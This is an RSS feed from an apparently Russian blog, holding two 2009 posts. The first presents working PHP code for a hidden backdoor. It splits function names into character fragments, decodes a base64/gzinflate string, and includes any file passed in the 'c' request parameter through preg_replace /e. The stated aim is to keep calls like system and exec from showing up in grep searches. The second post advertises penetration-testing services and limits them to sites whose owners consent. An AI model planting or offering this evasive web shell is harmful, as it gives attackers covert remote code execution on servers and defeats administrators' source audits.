<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Блог сео-студента &#187; безопасность</title>
	<atom:link href="http://seo-student.ru/tag/bezopasnost/feed" rel="self" type="application/rss+xml" />
	<link>http://seo-student.ru</link>
	<description>полезняшки :)</description>
	<lastBuildDate>Mon, 27 Jul 2009 13:31:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.4</generator>
		<item>
		<title>Замена eval() в php</title>
		<link>http://seo-student.ru/zamena-eval-v-php.html</link>
		<comments>http://seo-student.ru/zamena-eval-v-php.html#comments</comments>
		<pubDate>Wed, 15 Jul 2009 20:20:18 +0000</pubDate>
		<dc:creator>сео студент</dc:creator>
				<category><![CDATA[php]]></category>
		<category><![CDATA[Мои скрипты]]></category>
		<category><![CDATA[безопасность]]></category>
		<category><![CDATA[полезняшки]]></category>

		<guid isPermaLink="false">http://seo-student.ru/?p=279</guid>
		<description><![CDATA[Недавно ломал голову над тем, есть ли замена функции eval() в php. Задача: Сделать возможность вызова функций system, passthru, exec и т.д. так, чтобы в коде не было упоминания имен этих функций, то есть, чтобы при поиске по исходникам (grep -rl &#8216;function&#8216; /path) данные функции не светились. Немного поломав мозг, пришел к такому решению: // [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://seo-student.ru/wp-content/uploads/2009/07/bob.png"><img src="http://seo-student.ru/wp-content/uploads/2009/07/bob.png" alt="bob" title="bob" width="200" height="219" class="alignleft size-full wp-image-287" /></a>Недавно ломал голову над тем, есть ли замена функции eval() в php.</p>
<p><strong>Задача: </strong> Сделать возможность вызова функций <em>system</em>, <em>passthru</em>, <em>exec</em> и т.д. так, чтобы в коде не было упоминания имен этих функций, то есть, чтобы при поиске по исходникам (<strong>grep -rl &#8216;<em>function</em>&#8216; /<em>path</em></strong>) данные функции не светились.</p>
<p>Немного поломав мозг, пришел к такому решению:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">// функции для выполнения</span>
<span style="color: #000088;">$funcs</span> <span style="color: #339933;">=</span> <span style="color: #990000;">array</span><span style="color: #009900;">&#40;</span>
	<span style="color: #0000ff;">'g'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'z'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'i'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'n'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'f'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'l'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'a'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'t'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'e'</span><span style="color: #339933;">,</span>
	<span style="color: #0000ff;">'b'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'a'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'s'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'e'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'6'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'4'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'_'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'d'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'e'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'c'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'o'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'d'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'e'</span><span style="color: #339933;">,</span>
	<span style="color: #0000ff;">'p'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'h'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'p'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'i'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'n'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'f'</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'o'</span>
<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #000088;">$strng</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">'KyhKLUtNAQA='</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;"># прогнанный через gzinflate base64 хэш имени функции (preved)
</span>
<span style="color: #000000; font-weight: bold;">function</span> preved<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #666666; font-style: italic;">############## Здесь любой код для выполнения ############
</span>	<span style="color: #009900;">&#40;</span><span style="color: #990000;">isset</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_REQUEST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'c'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> ? <span style="color: #b1b100;">include</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_REQUEST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'c'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> <span style="color: #990000;">die</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #666666; font-style: italic;">###########################################################
</span><span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">function</span> test<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
		<span style="color: #000000; font-weight: bold;">global</span> <span style="color: #000088;">$funcs</span><span style="color: #339933;">,</span> <span style="color: #000088;">$strng</span><span style="color: #339933;">;</span>
		<span style="color: #000088;">$result</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$funcs</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">0</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$funcs</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$strng</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #b1b100;">return</span> <span style="color: #000088;">$result</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">// заменить на $func[X], если не нужно вызывать функцию preved()</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #b1b100;">echo</span> <span style="color: #990000;">preg_replace</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;/123/e&quot;</span><span style="color: #339933;">,</span>test<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">456</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>Как видно из листинга, скрипт использует баг в функции <em>preg_replace()</em> с флагом <em>/e</em>. Разобраться с ним не сложно.<br />
В результате получился скрипт, который может выполнять практически любые функции, кроме <em>eval()</em>, так как:</p>
<blockquote><p>это языковая конструкция, а не функция, она не может вызываться при помощи переменных функций (c) мануал</p></blockquote>
<p>Единственный минус &#8211; можно выполнить поиск по имени функции <em>preg_replace()</em>, но ее можно зашифровать аналогично примерам из скрипта или любым другим способом.</p>
]]></content:encoded>
			<wfw:commentRss>http://seo-student.ru/zamena-eval-v-php.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Аудит безопасности сайтов</title>
		<link>http://seo-student.ru/audit-bezopasnosti-sajtov.html</link>
		<comments>http://seo-student.ru/audit-bezopasnosti-sajtov.html#comments</comments>
		<pubDate>Sun, 22 Feb 2009 12:14:58 +0000</pubDate>
		<dc:creator>сео студент</dc:creator>
				<category><![CDATA[Блог]]></category>
		<category><![CDATA[безопасность]]></category>
		<category><![CDATA[работа]]></category>

		<guid isPermaLink="false">http://seo-student.ru/?p=146</guid>
		<description><![CDATA[Предоставляю следующие услуги: Удаленная проверка ресурса (тест на проникновение) Проверяю сайт так, как я хотел бы его взломать. Проверка по множеству типов атак (SQL-Injection, XSS, PHP-Injection и т.д.). Проверка исходного кода веб-приложения Проверка исходного кода приложения на наличие уязвимостей (при необходимости, их устранение). Предоставляю детальный отчет после проверки. В связи со многими просьбами произвести проверку [...]]]></description>
			<content:encoded><![CDATA[<p>Предоставляю следующие услуги:<span style="text-decoration: underline;"><br />
</span></p>
<ul>
<li><span style="color: #666699;">Удаленная проверка ресурса (тест на проникновение)</span></li>
</ul>
<p>Проверяю сайт так, как я хотел бы его взломать. Проверка по множеству типов атак (SQL-Injection, XSS, PHP-Injection и т.д.).</p>
<ul>
<li><span style="color: #666699;">Проверка исходного кода веб-приложения</span></li>
</ul>
<p>Проверка исходного кода приложения на наличие уязвимостей (при необходимости, их устранение).</p>
<p><span style="color: #993300;">Предоставляю детальный отчет после проверки.</span></p>
<p><em>В связи со многими просьбами произвести проверку на безопасность различных ресурсов, хочу сразу предупредить:</em></p>
<p>Дело в том, что я <strong>не</strong> проверяю сайты без согласия их владельцев, ибо это незаконно. Вы должны предоставить доказательства того, что это Ваш проект. Например, создать в корне сайта файл с gfyrty.txt (к примеру) или предоставить другие доказательства (обговаривается при беседе).</p>
<p>Если все нормально, проверка будет проведена.</p>
<ul>
<li><span style="text-decoration: underline;"><strong><a href="http://seo-student.ru/contact">Контакты</a></strong></span></li>
</ul>
<ul>
<li><span style="text-decoration: underline;"><strong><a href="http://mastertalk.ru/topic71368.html">Отзывы</a></strong></span> (по запросу предоставлю остальные)</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://seo-student.ru/audit-bezopasnosti-sajtov.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

